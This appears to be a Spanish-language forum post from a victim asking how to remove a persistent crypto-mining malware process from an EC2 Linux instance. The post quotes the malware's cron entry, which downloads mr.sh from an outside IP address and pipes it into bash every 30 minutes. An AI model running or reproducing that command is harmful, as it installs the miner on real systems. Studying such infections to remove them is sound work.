En los últimos días, he notado que las aplicaciones que se ejecutan en mi instancia EC2 de Linux son muy lentas. La ejecución topdel comando me mostró que hay un proceso /var/tmp/sustseque utiliza la mayor parte de la CPU.
Maté ese proceso. Sin embargo, después de reiniciar la instancia, volvió a ejecutarse y a utilizar la mayor parte de la CPU. También realiza entradas cron para el siguiente script:
*/30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
Busqué en Google y descubrí que se trata de un malware de minería de criptomonedas. He eliminado sus huellas de/var/tmp/y eliminó las entradas en Crontab. sin embargo, estas entradas en Crontab parecen regresar de algún lugar y no pude rastrear la ubicación exacta del script que genera estas entradas.
También limpié las entradas /var/spool/cron*.
No encontré mucha información en línea para solucionar este problema. Cualquier ayuda aquí sería muy apreciada.
¡¡Gracias de antemano!!